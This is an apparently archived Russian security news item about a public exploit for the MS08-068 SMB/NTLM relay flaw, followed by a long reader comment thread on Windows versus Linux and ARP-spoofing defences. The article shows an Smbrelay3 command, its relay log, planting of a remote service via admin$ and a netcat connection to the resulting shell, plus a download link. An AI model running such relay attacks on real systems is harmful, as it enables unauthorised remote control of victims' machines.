Опубликован полнофункциональный эксплоит к уязвимости MS08-068

Теги: уязвимость, эксплоит

В публичном доступе находится эксплоит к недавно исправленной уязвимости в протоколе SMB.

В публичном доступе находится полнофункциональный эксплоит к уязвимости в реализации протокола SMB в Microsoft Windows. Проблема заключается в том, что NTLM позволяет пользователям отвечать на входящие подключения от других хостов и удачно аутентифицироваться на системе без знания пароля. Таким образом, если пользователь подключается к удаленной системе с помощью NTLM, существует возможность компрометации системы пользователя.

Эта аутентификационная схема используется в большом количестве протоколов, например HTTP. Также, существует функционал, позволяющий браузеру (iexplore) или системе (explorer) по умолчанию отправлять аутентификационные данные серверу, если сервер требует аутентификацию.

Smbrelay3 – утилита, которая позволяет злоумышленнику произвести следующие типы атак:

  • HTTP –> SMB – соединение с браузером и передача данных на SMB хост
  • SMB -> SMB – соединение с SMB системой и передача данных на другой хост
  • IMAP -> SMB – соединение с почтовым IMAP клиентом и передача данных на другой хост
  • POP3 -> SMB – соединение с почтовым POP3 клиентом и передача данных на другой хост
  • SMTP -> SMB – соединение с почтовым SMTP клиентом и передача данных на другой хост

Если полученные утилитой учетные данные принадлежат администратору системы, Smbrelay3 автоматически создает удаленную консоль на уязвимой системе.

Пример атаки:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Smbrelay3 можно скачать по адресу: http://www.securitylab.ru/poc/363118.php

В настоящий момент в публичном доступе находятся следующие эксплоиты к уязвимости MS08-068:

Для удачной эксплуатации уязвимости целевой пользователь должен подключиться к злонамеренному серверу.

SecurityLab рекомендует всем пользователям установить исправление с сайта производителя.


или введите имя

CAPTCHA
Страницы: 1  2  3  4  
17-11-2008 06:17:51
смешно, ага скоро выйдет очередной срочный костыль, а пока, наверное, некрософт будет рекомендовать "воздердаться от использования протокола smb в windaffs"
0 |
321
17-11-2008 06:52:15
А прочитать SecurityLab рекомендует всем пользователям установить исправление с сайта производителя.мозгов не хватило?
0 |
Вася
17-11-2008 09:11:17
Над чем ржом ? Над собой ? Проблема извесна, есть заплатка, официально доступна с сайта мелкософт, ставить могут все. Если нехватает ума поставить - то это проблемы юзера.
0 |
Проблем
17-11-2008 10:15:56
Один косяк, проблема известна как оказывается уже почти 9 лет9 лет, а патч только-что вышел...
0 |
17-11-2008 11:16:13
Неправда ваша. Включение свежих заплаток во все выпускаемы ОС - проблема исключительно производителя, т.е. Microsoft. Этой дырище уже 9 лет, вся седая и пыльная. Сколько за 9 лет было выпущено ОС от M$? И во сколько из них заплатка входит в стандартную поставку? Пользователь ничего не должен качать, не должен суетиться. Он должен купить продукт, в котором все известные на момент покупки уязвимости устранены.
0 |
abadonna
18-11-2008 07:13:10
Сколько за 9 лет было выпущено ОС от M$? 0
0 |
21-11-2008 18:36:12
Имеются в виду продаваемые экземпляры. Строго говоря они тоже "выпускаются".
0 |
Анонимус
17-11-2008 07:48:36
Под *nix кто то собирал? работает ?
0 |
zcode
17-11-2008 12:57:14
сколько можно плоскари толкать... чес слово, з*ли уже...
0 |
ы
17-11-2008 15:33:36
ппц, ну тупой... Он имеет ввиду про сплойт, чтоб из под никсов маздаи валить.
0 |
97344
18-11-2008 13:50:17
на фоне постоянных дискуссий не до конца уловил смысл сказанного скорее всего.
0 |
76265
17-11-2008 09:15:23
Виндузятникам же говорили, что эксплоит есть, а они упорно говорили, что нет.
0 |
17-11-2008 11:18:49
Виндузятнички вообще интересные сущетва - яркий пример двоемыслия (doublethink) из "1984" Оруэлла в реальности. Сами понимают, что сидят в решете, однако всем упорно доказывают (и сами начинают верить в то, что доказывают) что у них все здорово, "ниаднаво глюка или зависона не было, все атлична пашет!" Смешно.
0 |
антипенгвин
17-11-2008 17:32:05
пингвинятники не менее интереснее. Пингвинизм - это такая форма изощренного мазохизма. Понимают, что можно все делать проще и эффективнее, просто сесть за комп и решать свои задачи, без ковыряний в консоли и компелирования ядер, но тем не менее продолжают жрать кактус. Более того, они даже видят как более адекватные пользователи запросто играют в игры, без шаманских плясок с эмуляторами, пользуются нормальным софтом типа Офис, Фотожоп, а не не жалкими пародиями типа ОпенОфис, Гимп и т.д. Это такая форма помешательства, и к сожалению _буйного_, т.к. пытаються всех убедить, что их кривая псевдомногозадачная DOS-like ОС "типа крутая и фсе такое". Прежде всего стараются убедить себя, закрывают глаза на реальное положение вещей, на то, что они попросту неудачники, дочатся в консоли и зобретают велосипеды и констыли, тогда как более адекватные люди просто решают свои задачи максимально эффективно(задачи: геймеру погамиться в новейшие гамы, дизайнеру - рисовать дизайны в фотошопе, программисту - разрабатывать программы в _нормальной_ ИДЕ, а не в vim/eclipse). По поводу дыр - они есть везде. Достаточно вспомнить про desktop файлы в КДЕ, и про то как линупс сваливался в кернел паник от простого пинга И это при ~1,5% распространении линупса, а что было бы будь его популярность повыше - вобще ужос...
0 |
29476
17-11-2008 18:20:03
не интересно уже, компиляция ядра вообще существует только в фантазии виндузятников.
0 |
виндузятники
17-11-2008 18:44:40
угу и зависимости и костыли-репозитарии и кривая поддержка железа и мазохисткие ковыряния в конфигах и консолях - все фантазии ))))
0 |
96988
17-11-2008 18:48:12
Ну если речь идёт про реестр и про DLL-hell, то не фантазии, да.
0 |
xix
17-11-2008 19:14:15
правда ? а вы откуда такой осведомленный ? про конфиги и консоль знаете Оо предположу, что неудачно пытались заюзать *nix , но из-за кривых рук, слабеньких нервишек, лени, низкого интелекта вам это не удалось, и теперь пытаетесь поднять свое ущемленное достоинство обсирая тех, у кого это получилось ? ))))
0 |
антипенгвин
17-11-2008 22:04:42
Почти угадал, мне вполне удалось юзать ваш несчастный линупс, просто это кривое убожество лично меня не устраивает на десктопе.
0 |
abadonna
18-11-2008 08:49:54
просто это кривое убожество лично меня не устраивает на десктопе"Это кривое убожество", также известное как "ручонки ламера", одинаково плохо на любом десктопе. Неудивительно, что не устраивает. Просто виндоус создаёт иллюзию прямоты рук, а линукс этой иллюзии не создает. Вот вам и обидно.
0 |
антипенгвин
18-11-2008 16:37:44
иллюзии - удел линупса, винда не создает никаких иллюзий, она просто работает дружестввенно к пользователю? Вот вам и обидно.А мне то от чего обидно? У меня Windows.
0 |
Балмер
18-11-2008 18:05:04
А мне то от чего обидно? У меня Windows. Правильно, гоните линупсятников с ананасами, апельсинами и бананами. Вы ещё не всю нашу сладкую морковку съели.
0 |
86383
18-11-2008 21:16:28
Как в дружественной винде авторан дисков отключить?
0 |
Представьте: имеется такая возможность. Не ожидали, что в винде можно что-то настраивать?
0 |
73264
19-11-2008 12:26:05
Ну давайте, расскажите, какое окно открыть, какую галочку снять...
0 |
антипенгвин
19-11-2008 00:34:28
У меня его сразу отключает VmWare при установке, на других компах просто нажимаю Shift
0 |
24247
19-11-2008 12:27:34
А навсегда? Чтоб даже если я кликаю по иконке привода - мне открывался бы каталог, а не запускался авторан. Костыли - это хорошо, только когда ног у системы нет.
0 |
19-11-2008 12:29:23
ты не понял, это чудо, чтоб отключить авторан, устанавливает вмваре! )
0 |
48488
19-11-2008 12:56:21
А, ну тоже метод
0 |
Bugg
19-11-2008 16:17:52
При этом, если не ошибаюсь, вмварь отключает авторан только для сидюков. Полное отключение - это NoDriveTypeAutorun=0xff. Не припомню, чтобы такое значение выставляла вмварь.
0 |
21-11-2008 18:54:49
Так и запишу. Чтобы отключить авторан надо поставить VMware...
0 |
abadonna
18-11-2008 23:36:05
винда не создает никаких иллюзийАга, вопиющая клиническая прямо реальность, начиная с "диска C:" она просто работает дружестввенно к пользователюНе вижу ничего дружественного в возможности стать распространителем вирусов, просто вставив в комп флешку. А мне то от чего обидно? От того, что увидели "кривое убожество" своих представлений о вычислительной технике, столкнувшись с линуксом. Учитесь, это полезно.
0 |
Расскажите, о всезащищённые, каким образом защищаетесь от arp-спуфинга в линуксе?
0 |
Bugg
19-11-2008 04:47:50
Взаимная авторизация: IPSec (легковесный AH, если не требуется шифрование), OpenVPN (практически то же самое).
0 |
антипенгвин
19-11-2008 05:39:54
IPSec, VPN жжош... )))
0 |
Bugg
19-11-2008 16:20:45
Да, IPSec. Возражения по существу будут?
0 |
антипенгвин
19-11-2008 17:28:37
коннектишся в инет через какую-то сеть (провайдерскую, корпоративную) со своего недолинупса, и что, побежишь заставлять админа специально для тебя поднять на шлюзе VPN или IPSec? бгг, линупсоиды сказочники...
0 |
Bugg
19-11-2008 20:42:18
DSL на работе и дома. И у меня есть возможность поднять VPN-шлюз на одном из внешних серверов. А сам-то ты что можешь противопоставить? Ethernet-канал в неуправляемом кампусном сегменте?
0 |
Часть персональных файерволлов под винду (типа Аутпоста) пресекают arp-спуфинг. Пусть и не полностью, но от толпы скрипткидди помогает. А без всяких шифровалок вам остаётся только модифицировать работу arp-протокола вручную (т.е. реализовывать arp-антидот, который, наверное, уже и не поддерживается разработчиками давно). И вполне возможно, что при обновлениях ядра придётся снова проводить модификацию. Очень юзабельно, да?
0 |
20-11-2008 02:24:08
в линуксе arp -s прописывает в статику, и арп-спуфинг идет лесом. в венде тоже есть arp -s , но он там только чтоб запись сама не удалялась после определенного периода времени, от арп-спуфинга это не спасает.
0 |
Судя по всему, вы настолько увлеклись изучением линукса, что знания винды у вас остали от жизни: уже давно статическую запись в винде arp-пакетами не переправить. К то му же, статическая запись - это далеко не самый лучший выход из ситуации
0 |
21-11-2008 04:22:08
проверил - точно, на SP2 уже не переправить, можно было на SP1
0 |
Во-первых, awpwatch и статические записи - не самый лучший выход из положения, имхо. Во-вторых, и это (статические записи и аналог awpwatch) и шифрование поддерживается в винде. В-третьих, если бы я не сказал полной правды, утаив о том, что файерворллы в винде не полностью пресекают эту атаку - очень сомневаюсь, что вы бы сейчас громко заявляли о "ложном чустве безопасности". В плане защиты от arp-спуфинга поклонники линукса были на шаг впереди пользователей винды, когда у вас был arp-антидот (хотя он полностью не решал проблемы). Теперь же вы утратили накопленный опыт и поэтому с arp-спуфингом в настоящее время в линуксе, имхо, хуже чем в винде
0 |
Bugg
21-11-2008 11:26:58
Во-первых, awpwatch и статические записи - не самый лучший выход из положения, имхо.Почему? Сомневаюсь, что вы до конца поняли, о чем речь, поскольку несколько раз повторили за мной опечатку в слове arpwatch. На счет поддержки в винде аналогов arpwatch - может быть. А насколько просто там написать обработчик сообщений от этого аналога? Думаю, сложнее, чем в юниксах, из-за отстутсвия инструментов. О поддержке IPsec в винде я знаю. Более того, использую. Очень рад за винду. OpenVPN там, кстати, тоже есть. В-третьих, если бы я не сказал полной правды, утаив о том, что файерворллы в винде не полностью пресекают эту атаку - очень сомневаюсь, что вы бы сейчас громко заявляли о "ложном чустве безопасности".Да сомневайтесь, сколько вам влезет, мне не жалко. А то, что файрволы пресекают не до конца - понятно и ежу, поскольку работают ваши файрволы только на ПК, но не на активном оборудовании, которое также подвержено... В плане защиты от arp-спуфинга поклонники линукса были на шаг впереди пользователей винды, когда у вас был arp-антидот (хотя он полностью не решал проблемы).Вы не поняли. В юниксах такие полумеры никому не нужны. Ради интереса, можете сходить в лист рассылки misc@openbsd.org (подписаться - легко) и поспрашивать там. Скорее всего, разработчики объяснят вам свою позицию. В плане защиты от arp-спуфинга поклонники линукса были на шаг впереди пользователей винды, когда у вас был arp-антидот (хотя он полностью не решал проблемы).Я не поклонник линукса, и юзаю его лишь постольку, поскольку Brad Spengler и PaX Team все еще тянут свои проекты, невзирая на старания Торвальдса. В составе ядра идут неплохие инструменты для группового управления ресурсами, что делает линукс более "рыночным", чем BSD. Плюс, из юникс-подобных ОС, нужная мне вмварь работает только под линуксом. Полноценные решения проблем c ARP-спуфингом в линуксе есть. Более того, опять-таки полноценные решения есть и для активного оборудование - покупка и настройка управляемого. А костыли никого не интересуют. А лично меня, например, не интересует набор защит рантайма в дистрибутивах RedHat, поскольку должного уровня безопасности он не обеспечивает, как и решения-костыли, доступные под винду. Теперь же вы утратили накопленный опыт и поэтому с arp-спуфингом в настоящее время в линуксе, имхо, хуже чем в винде Думаете, в сообществах юникс-подобных ОС, включая OpenBSD, дураки все, кроме создателей arp_antidot? Такие костыли там просто никому не нужны.
0 |
Я просто скопировал за вами слово, чтоб его не набирать на клавиатуре каждый раз. Но можете считать, что вы меня обставили, если вам так приятней будет Во вторых, в этом arpwatch сначала надо создать базу соответствия реальных IP/MAC и поддерживать её актуальной. При переходе в другую сеть надо заменять базу. Это ли не костыль??? Та же самая ситуация со статическими записями. А какие полноценные решения в линуксе для защиты от arp-спуфинга? Честно говоря, ктоме этих самых "костылей" я в линуксе по теме arp-спуфинга ничего не видел. И уж лучше так, чем никак. А про активное оборудование - давайте не будем обсуждать: в конце концов и виндовый роутер можно настроить так, чтоб сеть на подсети с 2 компами (один из которых и будет роутером) разбить и толку от спуфинга - никакого
0 |
Bugg
21-11-2008 14:25:24
Забыл добавить. А про активное оборудование - давайте не будем обсуждать: в конце концов и виндовый роутер можно настроить так, чтоб сеть на подсети с 2 компами (один из которых и будет роутером) разбить и толку от спуфинга - никакого Вы сами поняли, что сказали? Во-первых, логическая маршрутизация в рамках сети, связанной на неуправляемой коммутации, от ARP-спуфинга НЕ спасет. Абсолютно. Во-вторых, пока у вас в сети присутствуют неуправляемые коммутаторы, вы их никакими роутерами от спуфинга не защитите. ARP-таблиц они не сроят. У них есть таблицы привязки MAC-адресов к физическим портам. И эти таблицы также подвержены спуфингу, на том же канальном уровне, что и ARP.
0 |
Да, вы абсолютно правы: гибкость систем линукс часто пугает людей, привыкших жить "на всё готовенькое". И действительно: неудачные эксперименты с линуксом вбивают людям догму, что там всё через попу. Поэтому эти люди живут вчерашним днём и совершенно не в курсе, что линукс можно поставить на комп так же просто, как и винду. При этом, научиться по аналогии с миром юниксов собирать свои решения в винде с помощью набора иструментов он не может за отсутствием там этого набора инструментов.А вот тут я уже ловлю вас на недостаточном знании того, о чём вы говорите. Пример winpcap, позволяющий работать с сетью на низком уровне. логическая маршрутизация в рамках сети, связанной на неуправляемой коммутации, от ARP-спуфинга НЕ спасет. Абсолютно.Очень даже спасёт: разбиваем сети на подсети по 2 компа, один из которых - сам роутер (т.е. в каждой подсети будет значится один и тот же роутер). Любой комп в сети, обращаясь к другому компу, в своей записи будет иметь запись только о МАС-адресе роутера. Поэтому его левые пакеты никак не попадут к компам, находящимся в других подсетях
0 |
Bugg
22-11-2008 08:11:37
А вот тут я уже ловлю вас на недостаточном знании того, о чём вы говорите. Пример winpcap, позволяющий работать с сетью на низком уровне.] Нет, тут вы, не разобравшись, цепляетесь к словам. Если уж на то пошло, то Perl и Python работают в винде, в сети есть набор утилит Sysinternals, тот же winpcap, windump и т.д., а что-то даже есть в составе самой винды. Но все эти утилиты, даже если вы их установили и пользуетесь, - лишь жалкая пародия на набор инструментов, если сравнивать с таковым в юниксах, которая, к тому же, изначально отуствует. То есть, неполный набор плохих инструментов. И у меня сразу вопрос: а вам-то есть, с чем сравнивать? Вы с юниксами насколько плотно работали? Очень даже спасёт: разбиваем сети на подсети по 2 компа, один из которых - сам роутер (т.е. в каждой подсети будет значится один и тот же роутер).От ARP-спуфинга это как защищает? Каким-таким чудесным образом станет вдруг нельзя подтасовать адрес гейта и/или клиента? На практике такая конфигурация вряд ли кого-либо устроит по целому ряду причин. Любой комп в сети, обращаясь к другому компу, в своей записи будет иметь запись только о МАС-адресе роутера.Статическую запись, что ли? Если динамическую, то она также будет подвержена спуфингу. Поэтому его левые пакеты никак не попадут к компам, находящимся в других подсетяхПопадут. Как минимум, посредством спуфинга или переполнения таблиц соответствия MAC-адресов физическим портам на активном неуправляемом оборудовании - даже если вы полностью защититесь от ARP-спуфинга, статически прописав ВСЕ ARP-записи и насоздавав кучу подсетей с двумя узлами в каждой.
0 |
Но все эти утилиты, даже если вы их установили и пользуетесь, - лишь жалкая пародия на набор инструментов, если сравнивать с таковым в юниксах, которая, к тому же, изначально отуствует. То есть, неполный набор плохих инструментов. И у меня сразу вопрос: а вам-то есть, с чем сравнивать? Вы с юниксами насколько плотно работали?Нет, практически не с чем мне сравнивать. Знаю только, что при работе с блютусом в линуксе действительно есть интсрументы, которых нет в винде. Но суть была не в этом: я хотел сказать, что winpcap - очень гибкий интсрумент. И он позволяет создавать любые сетевые пакеты. Единственное, чего он не может (кажется) - это давать программировать уже на физическом уровне. А вообще winpcap - полный аналог libpcap в юниксах. А значит, и возможности у него те же
0 |
Bugg
23-11-2008 21:41:26
Но суть была не в этом: я хотел сказать, что winpcap - очень гибкий интсрумент.Один в поле - не воин. А значит, и возможности у него те жеРазницу между инструментом и набором инструментов сами осознаете?
0 |
Bugg
22-11-2008 09:44:30
Можнт, вы поделитесь опытом, чтобы я впредь мог представлять?Один из вариантов для сети с неизвестной периодичностью смены MAC-адресов, если коротко и по минимуму: обработчик должен посылать ARP-запрос на определение IP-адреса по каждой изменившейся ARP-записи, следя за количеством ответов, MAC-адресами отправителей и содержимым фрейма. Если ответ приходит более, чем из одного источника, при валидности содержимого в ответе с прежнего MAC-адреса, обработчик прописывает статическую (на время, в зависимости от выбранной политики) ARP-запись в таблицы ядра с указанием прежнего MAC-адреса. Для уверенности процедуру можно повторять несколько раз, с той или иной периодичностью. Если ответ приходит только из нового источника, обработчик оставляет изменившуюся запись. При этом, различий между ответом без запроса и ответом на отправленный запрос не делается. Возможность DoS сводится на нет тем, что на заданное время ARP-запись прописывается статически и не нуждается в проверках. Админ может получать уведомления от обработчика в той или иной форме, в том числе по IM-протоколам. В случае работы на всех узлах сети, не указываемых в списке исключений, служб SSH (или любых других) с заранее известными ключами или сертификатами, подписанными CA и отсутствующих в CRL, можно верифицировать владельца пары адресов, начиная SSH-сессию с каждым из претендентов на IP-адрес, допуская в ARP-таблицы только запись с MAC-адресом обладателя ключа или сертификата, соответствующего занимаемому IP-адресу. Лично у меня SSH поднят на всех юникс-узлах. Однако, здесь есть простор для атак на доступность SSH, поэтому в общем случае, без учета конфигурации файрвола и активного оборудования, я бы не рекомендовал. Исключительно пассивный обработчик, как и активный, может анализировать логи arpwatch за некоторый период и/или периодические дампы ARP-таблиц и прописывать в ядро запись с указанием наиболее известной пары адресов в случае, если arpwatch рапортует о периодических измениниях записи новой парой адресов и обратно, что может являться признаком спуфинга. И наконец, в сети может быть определена политика включения новых узлов, которая позволит строить статические или псевдостатические (не допускающих или обращающих сиюминутные изменения) ARP-таблицы на узлах, с интервалом обновления в один день и только в случае, если прежнияя связка MAC-IP на контрольные запросы не отвечает. В случае экстренной замены оборудования в сети с такими политиками админ может назначить новому оборудованию старый MAC-адрес, сверившись с действующими таблицами на одном или нескольких узлах, даже не зная MAC-адреса старого оборудования. Если это - камень в мой огород, то... не хочу хвастаться, но всё же предложу прочитать вот эту статью: http://www.securitylab.ru/contest/313500.phpВы слишком много внимания уделили костылям, совершенно не рассмотрев тот же IPsec AH. Возможности активного оборудования рассмотрены по минимуму. Писали об эдаком общем случае? Понимаю. Не понимаю, зачем все сводить к общему случаю, хотя бы, в рамках нашего разговора. Ведь даже в сети, никак не защищенной от ARP-спуфинга и атак на активное оборудование, данные, представляющие ценность, могут передаваться исключительно по защищенным каналам, не поддающихся mitm-атакам. Или вы всерьез предложите в любом случае считать юникс-машины уязвимыми к ARP-спуфингу, невзирая на конфигурацию сети в отдельных случаях, в т.ч. на тот же IPsec, только потому, что в некотором общем случае они от спуфинга не защищены? Уточните уже свою позицию.
0 |
Bugg
22-11-2008 18:29:03
Еще мысль пришла: для верификации пар MAC и IP адресов можно обращаться к белым спискам на базе DNSSEC, + TSIG для автоматизированного обновления списка а ля ff.ee.dd.cc.bb.aa.whitelist.local. IN A 11.22.33.44. Подобие защищенного централизованного ®ARP также можно построить, реализовав соответствующую генерацию записей по динамическим апдейтам. Естественно, этот способ только для контролируемых сетей, и одинаково хорошо жолжен работать в винде и юниксах. Но никакие подобные меры не защитят от атак на неуправляемое активное оборудование и на высокоуровневые протоколы. То есть, полноценное решение - только IPsec, остальное - ему в помощь.
0 |
даже в сети, никак не защищенной от ARP-спуфинга и атак на активное оборудование, данные, представляющие ценность, могут передаваться исключительно по защищенным каналам, не поддающихся mitm-атакам.Да, всё шифровать - это было бы здорово. Но вот проблема: очень мало сетей, где это делают. Особенно это касается домашних сетей, реализованных провайдером: там нету никакого шифрования трафика (у большинства провайдеров - точно) Или вы всерьез предложите в любом случае считать юникс-машины уязвимыми к ARP-спуфингу, невзирая на конфигурацию сети в отдельных случаях, в т.ч. на тот же IPsec, только потому, что в некотором общем случае они от спуфинга не защищены?Именно так: да, они уязвимы. Потому что суть как раз в том, что для защиты от этого типа атак приходится изменять настройки сети. Следовательно, в сетях, где нету шифрования, юникс-машины будут уязвимы к этим атакам. Мне совершенно непонятно: почему можно подменить запись послав arp-запрос с адресом назначения не броакаст, а реальным МАС-адресом получателя? Ведь и ежу понтяно, что это 100% атака. И ладно винда - почему в юникс-системах до сих пор это возможно??? Также непонятно почему можно подменять запись арп-ответами, если система арп-запросы не посылала? Ну, да: я слышал про "самопроизвольные фрп-ответы". Но честно говоря, на практике я их никогда не видел. Следовательно, и нужды обновления таблицы из этих пакетов я также не вижу Вы слишком много внимания уделили костылям, совершенно не рассмотрев тот же IPsec AH. Возможности активного оборудования рассмотрены по минимуму.Я сконцентрировал внимание именно на малоизвестных фактах. О мелочах, которые на самом деле, многово стоят, но почему-то мало кому известны. О VPN, DAI и т.д. и так много понаписано - зачем повторяться? Кстати, я вот на практике с IPSec не встречался, но вот я прочёл , что IPsec AH - подразумевает аутентификацию. Тогда вопрос: как это защитит от спуфинга? Один из вариантов для сети с неизвестной периодичностью смены MAC-адресов, если коротко и по минимуму:Нда... не самый простой способ... но думаю, это вполне работоспособно и эффективно в плане защиты. Но не забывайте: у нас тема разговора: "windows vs unix-like". Стало быть, интересует: какие преимущества в этом у unix-like систем? Сколько времени и сил потребуется рядовому пользователю, чтобы это сделать? Хватит ли у него знаний чтоб всё это сделать (допустим, писать на си и создавать скрипты простенькие он в силах)? Почему подобные механизмы не реализованы в линуксе сейчас?
0 |
23-11-2008 17:05:50
Также непонятно почему можно подменять запись арп-ответами, если система арп-запросы не посылала? Может, потрудитесь, все-таки, изучить вопрос, прежде чем пукать в лужи? /proc/sys/net/ipv4/conf/default/arp_accept по умолчанию стоит в 0 Кстати, как в винде насчет тонкой настройки сети (и вообще ядра), есть что-то вроде /proc/sys/ ?
0 |
Ок, будем считать что здесь я сказал, не разобравшись в вопросе до конца. Но почему тогда в линуксе можно подменить arp-таблицу направленным (а не широковещательным) arp-запросом?
0 |
25-11-2008 12:11:23
ну дык ты хоть занаправляйся направленными арп-ответами, если линукс не посылал запрос %)
0 |
А вот теперь вы, простите, пукаете в лужу, не разобравшись в сути вопроса. Советую вам разобраться чем отличается запрос от ответа и почему в данном случае глубоко плевать что там отправлял линукс или не отправлял
0 |
05-12-2008 03:31:35
гм, не внимательно прочитал. А как направленным арп-запросом подменить таблицу?
0 |
Так же как ответом: http://www.securitylab.ru/contest/313500.php
0 |
Bugg
23-11-2008 23:30:10
Кстати, я вот на практике с IPSec не встречался, но вот я прочёл , что IPsec AH - подразумевает аутентификацию. Тогда вопрос: как это защитит от спуфинга?Аутентификация - взаимная, по PSK, привязанному к адресу (IP или FQDN) узла, или сертификату, подписанному доверенным CA, также привязанному к адресу узла в subjectAltName (кстати, до висты в винде указывать IP-адрес в сертификате было бесполезно). AH спасает от спуфинга тем, что не позволяет атакующему подделывать пакеты. Для шифрования чувствительного трафика избирательно применяется ESP.
0 |
Bugg
24-11-2008 00:08:47
Именно так: да, они уязвимы.Спрошу еще раз, проще. Уязвимы в любом случае? Знаете, если вам важна безопасность, вы ее либо обеспечиваете, имея технические возможности, либо покупаете за деньги. Потому что суть как раз в том, что для защиты от этого типа атак приходится изменять настройки сети.Суть как раз в том, что без "изменения настроек сети" защититься от этого типа атак в общем случае не получится. Следовательно, в сетях, где нету шифрования, юникс-машины будут уязвимы к этим атакам.В сетях, где нету шифрования (и/или других мер, вроде физической изоляции каналов связи), последствия атак на такие уязвимости не должны стоить выеденного яйца. Пользователь в таких сетях должен понимать свое положение. Мне совершенно непонятно: почему можно подменить запись послав arp-запрос с адресом назначения не броакаст, а реальным МАС-адресом получателя? Ведь и ежу понтяно, что это 100% атака.В линуксе и других юникс-подобных ОС есть средства мониторинга и фильтрации таких запросов.
0 |
Bugg
24-11-2008 00:12:18
Мне совершенно непонятно: почему можно подменить запись послав arp-запрос с адресом назначения не броакаст, а реальным МАС-адресом получателя? Ведь и ежу понтяно, что это 100% атака.В линуксе и других юникс-подобных ОС есть средства мониторинга и фильтрации таких запросов. И ладно винда - почему в юникс-системах до сих пор это возможно???Потому что эта ОС делается кем попало и как попало, но остается при этом юникс-подобной и не остается без внимания хакеров-безопасников. Знающий пользователь сам оценит риски и защитит себя. А о безопасности обычных пользователей "должны" (могли бы) думать производители дистрибутивов. Но поскольку обычных пользователй безопасность интересует мало, и они готовы променять на любое удобство, даже мелкое, производители дистрибутивов тоже как-то не спешат тратить деньги и усилия на развитие невостребованных качеств продукта. Также непонятно почему можно подменять запись арп-ответами, если система арп-запросы не посылала?Нельзя. Я сконцентрировал внимание именно на малоизвестных фактах.На ограниченном наборе фактов, совершенно упустив из виду другие, еще менее известные. Это примерно, как рассказывать о малоизвестных факторах усиления надежности замков и дверей в доме, забыв упомянуть о просторной печной трубе и хрупких окнах без решеток и ставен. О мелочах, которые на самом деле, многово стоят, но почему-то мало кому известны.Да не стоят они почти ничего, IMHO... Не в обиду вам будет сказано.
0 |
Да не стоят они почти ничего, IMHO... Не в обиду вам будет сказано.Ну, если применять шифрование - то тогда конечно! А ещё можно отказаться от использования неподписаных флешек и при связи с любым сервером (будь то гугл или мэилру) требовать сертификатов. На ограниченном наборе фактов, совершенно упустив из виду другие, еще менее известныеНапример? Какие ещё малоизвестные?
0 |
Bugg
26-11-2008 03:58:12
Ну, если применять шифрование - то тогда конечно!Они сами по себе ничего не стоят. А ещё можно отказаться от использования неподписаных флешек и при связи с любым сервером (будь то гугл или мэилру) требовать сертификатов.Про PKI я уже писал, коммент без объяснений удалили. Например? Какие ещё малоизвестные? Об атаках на активное оборудование я уже говорил. А, вот, мой коммент на тему уязвимостей сеансового уровня к атакам на повторение пересылки данных с секлаба пропал. Со всеми вопросами обращайтесь к анонимному модератору. Вы для секлаба статью написали, вам и флаг в руки. А мне надоело.
0 |
Bugg
24-11-2008 00:46:00
Почему подобные механизмы не реализованы в линуксе сейчас? Я вам ответил, но мои ответы неоднократно кого-то на секлабе не устроили. Обращайтесь к секлабу. Заниматься технополитической самоцензурой мне надоело.
0 |
А если провайдер этого не предоставляет - что делать будете? Поднимать VPN где-то в инете и через него работать?
0 |
А если провайдер этого не предоставляет - что делать будете? Поднимать VPN где-то в инете и через него работать?
0 |
Bugg
19-11-2008 16:28:37
Да, у меня есть возможность прямо сейчас поднять VPN и работать через него. По некоторым направлениям я так и делаю. Кроме того, мои провайдеры предоставляют услуги VPN. Казалось бы, причем здесь различия между виндой и линуксом в противодействии ARP-спуфингу?
0 |
p
24-11-2008 15:51:41
никогда не угадаеш... arp-спуфингом! =)
0 |
антипенгвин
19-11-2008 00:46:15
От того, что увидели "кривое убожество" своих представлений о вычислительной технике, столкнувшись с линуксом.Малчег, мои представления о вычислительной технике начинались еще с ZX Spectrum и Электроники-60. А столкнувшись с линупсом я увидел лишь кривую поделку, не более... Учитесь, это полезно.Я и учусь, только немного другим вещам, и изучать еще так много, что мне жалко тратить это время на изучения консольного шаманства. В мире очень много гораздо более интересных вещей, а ОС - это инструмент, а не фетиш.
0 |
Гость
19-11-2008 00:50:35
Столкнувшись с антипенгвином я увидел лишь тупого виндотролля, не более...
0 |
76473
19-11-2008 12:28:34
Малчег, мои представления о вычислительной технике начинались еще с ZX Spectrum иТак и говори, что молодой ещё.
0 |
p
24-11-2008 15:58:37
" гораздо более интересных вещей" гораздо более интересных веществ
0 |
p
24-11-2008 15:48:48
да, лучше хавать то что дают! будь как все! будь серым УГ!
0 |
антипенгвин
17-11-2008 18:35:24
По поводу дыр. Они есть везде, но в винде их принципиально больше, чем в защищенном линуксе или OpenBSD.ХА-ХА-ХА! И чем это он защищенный, тем что из-за разных сборок ядра и зависимостей программы там вполне могут и не заработать (что и делают) и вирусы должны создаваться с учетом работы с различными черезжопно-собранными версиями ядра?
0 |
Bugg
17-11-2008 18:52:37
